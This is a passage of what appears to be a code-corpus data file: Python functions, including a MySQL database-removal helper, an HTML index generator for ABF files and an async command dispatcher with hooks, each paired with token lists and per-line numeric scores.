"y_pos_next",
"[",
"y_pos_next",
">",
"(",
"self",
".",
"y_n",
"-",
"2",
")",
"]",
"=",
"self",
".",
"y_n",
"-",
"2",
"# Check which sectors have not changed, and mark them as complete",
"no_move",
"=",
"np",
".",
"array",
"(",
"np",
".",
"logical_and",
"(",
"x_pos_guess",
"[",
"these",
"]",
"==",
"x_pos_next",
",",
"y_pos_guess",
"[",
"these",
"]",
"==",
"y_pos_next",
")",
")",
"x_pos_guess",
"[",
"these",
"]",
"=",
"x_pos_next",
"y_pos_guess",
"[",
"these",
"]",
"=",
"y_pos_next",
"temp",
"=",
"these",
".",
"nonzero",
"(",
")",
"these",
"[",
"temp",
"[",
"0",
"]",
"[",
"no_move",
"]",
"]",
"=",
"False",
"# Move to the next iteration of the search",
"loops",
"+=",
"1",
"# Return the output",
"x_pos",
"=",
"x_pos_guess",
"y_pos",
"=",
"y_pos_guess",
"return",
"x_pos",
",",
"y_pos"
] | 47.39759 | [
0.12,
0.18181818181818182,
0.05333333333333334,
0.0392156862745098,
0,
0.1111111111111111,
0.1111111111111111,
0.15,
0.041666666666666664,
0.15,
0.02666666666666667,
0,
0.13333333333333333,
0.13333333333333333,
0.125,
0.02531645569620253,
0.125,
0.02531645569620253,
0.18181818181818182,
0.05405405405405406,
0.1111111111111111,
0.03508771929824561,
0.03508771929824561,
0,
0.037037037037037035,
0.02564102564102564,
0.02666666666666667,
0.03076923076923077,
0.12087912087912088,
0.03937007874015748,
0,
0.029411764705882353,
0.08108108108108109,
0.05128205128205128,
0.11764705882352941,
0.04,
0.027777777777777776,
0.06896551724137931,
0.06896551724137931,
0.043478260869565216,
0.04225352112676056,
0.04225352112676056,
0.0410958904109589,
0.043478260869565216,
0.04225352112676056,
0.04225352112676056,
0.0410958904109589,
0,
0.02531645569620253,
0.05357142857142857,
0.05263157894736842,
0.05555555555555555,
0.05357142857142857,
0,
0.02531645569620253,
0.029850746268656716,
0.09302325581395349,
0.09195402298850575,
0.09523809523809523,
0.09302325581395349,
0,
0.03278688524590164,
0.029411764705882353,
0.047619047619047616,
0.03225806451612903,
0.03076923076923077,
0.047619047619047616,
0.03225806451612903,
0,
0.025974025974025976,
0.02631578947368421,
0.046511627906976744,
0.046511627906976744,
0.058823529411764705,
0.046511627906976744,
0,
0.037037037037037035,
0.09090909090909091,
0,
0.07407407407407407,
0.07407407407407407,
0.07407407407407407,
0.07407407407407407
] |
def db_remove(name, **connection_args):
'''
Removes a databases from the MySQL server.
CLI Example:
.. code-block:: bash
salt '*' mysql.db_remove 'dbname'
'''
# check if db exists
if not db_exists(name, **connection_args):
log.info('DB \'%s\' does not exist', name)
return False
if name in ('mysql', 'information_scheme'):
log.info('DB \'%s\' may not be removed', name)
return False
# db does exists, proceed
dbc = _connect(**connection_args)
if dbc is None:
return False
cur = dbc.cursor()
s_name = quote_identifier(name)
# identifiers cannot be used as values
qry = 'DROP DATABASE {0};'.format(s_name)
try:
_execute(cur, qry)
except MySQLdb.OperationalError as exc:
err = 'MySQL Error {0}: {1}'.format(*exc.args)
__context__['mysql.error'] = err
log.error(err)
return False
if not db_exists(name, **connection_args):
log.info('Database \'%s\' has been removed', name)
return True
log.info('Database \'%s\' has not been removed', name)
return False | [
"def",
"db_remove",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"# check if db exists",
"if",
"not",
"db_exists",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"log",
".",
"info",
"(",
"'DB \\'%s\\' does not exist'",
",",
"name",
")",
"return",
"False",
"if",
"name",
"in",
"(",
"'mysql'",
",",
"'information_scheme'",
")",
":",
"log",
".",
"info",
"(",
"'DB \\'%s\\' may not be removed'",
",",
"name",
")",
"return",
"False",
"# db does exists, proceed",
"dbc",
"=",
"_connect",
"(",
"*",
"*",
"connection_args",
")",
"if",
"dbc",
"is",
"None",
":",
"return",
"False",
"cur",
"=",
"dbc",
".",
"cursor",
"(",
")",
"s_name",
"=",
"quote_identifier",
"(",
"name",
")",
"# identifiers cannot be used as values",
"qry",
"=",
"'DROP DATABASE {0};'",
".",
"format",
"(",
"s_name",
")",
"try",
":",
"_execute",
"(",
"cur",
",",
"qry",
")",
"except",
"MySQLdb",
".",
"OperationalError",
"as",
"exc",
":",
"err",
"=",
"'MySQL Error {0}: {1}'",
".",
"format",
"(",
"*",
"exc",
".",
"args",
")",
"__context__",
"[",
"'mysql.error'",
"]",
"=",
"err",
"log",
".",
"error",
"(",
"err",
")",
"return",
"False",
"if",
"not",
"db_exists",
"(",
"name",
",",
"*",
"*",
"connection_args",
")",
":",
"log",
".",
"info",
"(",
"'Database \\'%s\\' has been removed'",
",",
"name",
")",
"return",
"True",
"log",
".",
"info",
"(",
"'Database \\'%s\\' has not been removed'",
",",
"name",
")",
"return",
"False"
] | 26.829268 | [
0.02564102564102564,
0.2857142857142857,
0.043478260869565216,
0,
0.125,
0,
0.125,
0,
0.04878048780487805,
0.2857142857142857,
0.08333333333333333,
0.043478260869565216,
0.04,
0.1,
0,
0.0425531914893617,
0.037037037037037035,
0.1,
0,
0.06896551724137931,
0.05405405405405406,
0.10526315789473684,
0.1,
0.09090909090909091,
0.05714285714285714,
0.047619047619047616,
0.044444444444444446,
0.25,
0.07692307692307693,
0.046511627906976744,
0.037037037037037035,
0.05,
0.09090909090909091,
0.1,
0,
0.043478260869565216,
0.034482758620689655,
0.10526315789473684,
0,
0.034482758620689655,
0.125
] |
def html_index(self,launch=False,showChildren=False):
"""
generate list of cells with links. keep this simple.
automatically generates splash page and regnerates frames.
"""
self.makePics() # ensure all pics are converted
# generate menu
html='<a href="index_splash.html" target="content">./%s/</a><br>'%os.path.basename(self.abfFolder)
for ID in smartSort(self.fnamesByCell.keys()):
link=''
if ID+".html" in self.fnames2:
link='href="%s.html" target="content"'%ID
html+=('<a %s>%s</a><br>'%(link,ID)) # show the parent ABF (ID)
if showChildren:
for fname in self.fnamesByCell[ID]:
thisID=os.path.splitext(fname)[0]
files2=[x for x in self.fnames2 if x.startswith(thisID) and not x.endswith(".html")]
html+='<i>%s</i>'%thisID # show the child ABF
if len(files2):
html+=' (%s)'%len(files2) # show number of supporting files
html+='<br>'
html+="<br>"
style.save(html,self.abfFolder2+"/index_menu.html")
self.html_index_splash() # make splash page
style.frames(self.abfFolder2+"/index.html",launch=launch) | [
"def",
"html_index",
"(",
"self",
",",
"launch",
"=",
"False",
",",
"showChildren",
"=",
"False",
")",
":",
"self",
".",
"makePics",
"(",
")",
"# ensure all pics are converted",
"# generate menu",
"html",
"=",
"'<a href=\"index_splash.html\" target=\"content\">./%s/</a><br>'",
"%",
"os",
".",
"path",
".",
"basename",
"(",
"self",
".",
"abfFolder",
")",
"for",
"ID",
"in",
"smartSort",
"(",
"self",
".",
"fnamesByCell",
".",
"keys",
"(",
")",
")",
":",
"link",
"=",
"''",
"if",
"ID",
"+",
"\".html\"",
"in",
"self",
".",
"fnames2",
":",
"link",
"=",
"'href=\"%s.html\" target=\"content\"'",
"%",
"ID",
"html",
"+=",
"(",
"'<a %s>%s</a><br>'",
"%",
"(",
"link",
",",
"ID",
")",
")",
"# show the parent ABF (ID)",
"if",
"showChildren",
":",
"for",
"fname",
"in",
"self",
".",
"fnamesByCell",
"[",
"ID",
"]",
":",
"thisID",
"=",
"os",
".",
"path",
".",
"splitext",
"(",
"fname",
")",
"[",
"0",
"]",
"files2",
"=",
"[",
"x",
"for",
"x",
"in",
"self",
".",
"fnames2",
"if",
"x",
".",
"startswith",
"(",
"thisID",
")",
"and",
"not",
"x",
".",
"endswith",
"(",
"\".html\"",
")",
"]",
"html",
"+=",
"'<i>%s</i>'",
"%",
"thisID",
"# show the child ABF",
"if",
"len",
"(",
"files2",
")",
":",
"html",
"+=",
"' (%s)'",
"%",
"len",
"(",
"files2",
")",
"# show number of supporting files",
"html",
"+=",
"'<br>'",
"html",
"+=",
"\"<br>\"",
"style",
".",
"save",
"(",
"html",
",",
"self",
".",
"abfFolder2",
"+",
"\"/index_menu.html\"",
")",
"self",
".",
"html_index_splash",
"(",
")",
"# make splash page",
"style",
".",
"frames",
"(",
"self",
".",
"abfFolder2",
"+",
"\"/index.html\"",
",",
"launch",
"=",
"launch",
")"
] | 51.44 | [
0.05660377358490566,
0.18181818181818182,
0.03333333333333333,
0.030303030303030304,
0.18181818181818182,
0.05454545454545454,
0.08695652173913043,
0.04716981132075472,
0.037037037037037035,
0.15789473684210525,
0.047619047619047616,
0.07017543859649122,
0.08,
0.07142857142857142,
0.0392156862745098,
0.05660377358490566,
0.038461538461538464,
0.07692307692307693,
0.05714285714285714,
0.07228915662650602,
0.09375,
0.10714285714285714,
0.05084745762711865,
0.058823529411764705,
0.046153846153846156
] |
async def apply_command(self, cmd):
"""
applies a command
This calls the pre and post hooks attached to the command,
as well as :meth:`cmd.apply`.
:param cmd: an applicable command
:type cmd: :class:`~alot.commands.Command`
"""
# FIXME: What are we guarding for here? We don't mention that None is
# allowed as a value fo cmd.
if cmd:
if cmd.prehook:
await cmd.prehook(ui=self, dbm=self.dbman, cmd=cmd)
try:
if asyncio.iscoroutinefunction(cmd.apply):
await cmd.apply(self)
else:
cmd.apply(self)
except Exception as e:
self._error_handler(e)
else:
if cmd.posthook:
logging.info('calling post-hook')
await cmd.posthook(ui=self, dbm=self.dbman, cmd=cmd) | [
"async",
"def",
"apply_command",
"(",
"self",
",",
"cmd",
")",
":",
"# FIXME: What are we guarding for here? We don't mention that None is",
"# allowed as a value fo cmd.",
"if",
"cmd",
":",
"if",
"cmd",
".",
"prehook",
":",
"await",
"cmd",
".",
"prehook",
"(",
"ui",
"=",
"self",
",",
"dbm",
"=",
"self",
".",
"dbman",
",",
"cmd",
"=",
"cmd",
")",
"try",
":",
"if",
"asyncio",
".",
"iscoroutinefunction",
"(",
"cmd",
".",
"apply",
")",
":",
"await",
"cmd",
".",
"apply",
"(",
"self",
")",
"else",
":",
"cmd",
".",
"apply",
"(",
"self",
")",
"except",
"Exception",
"as",
"e",
":",
"self",
".",
"_error_handler",
"(",
"e",
")",
"else",
":",
"if",
"cmd",
".",
"posthook",
":",
"logging",
".",
"info",
"(",
"'calling post-hook'",
")",
"await",
"cmd",
".",
"posthook",
"(",
"ui",
"=",
"self",
",",
"dbm",
"=",
"self",
".",
"dbman",
",",
"cmd",
"=",
"cmd",
")"
] | 35.192308 | [
0.02857142857142857,
0.18181818181818182,
0.08,
0,
0.030303030303030304,
0.16216216216216217,
0,
0.07317073170731707,
0.14,
0.18181818181818182,
0.025974025974025976,
0.05555555555555555,
0.13333333333333333,
0.07407407407407407,
0.029850746268656716,
0.125,
0.034482758620689655,
0.04878048780487805,
0.09523809523809523,
0.05714285714285714,
0.058823529411764705,
0.05263157894736842,
0.11764705882352941,
0.0625,
0.03773584905660377,
0.027777777777777776
] |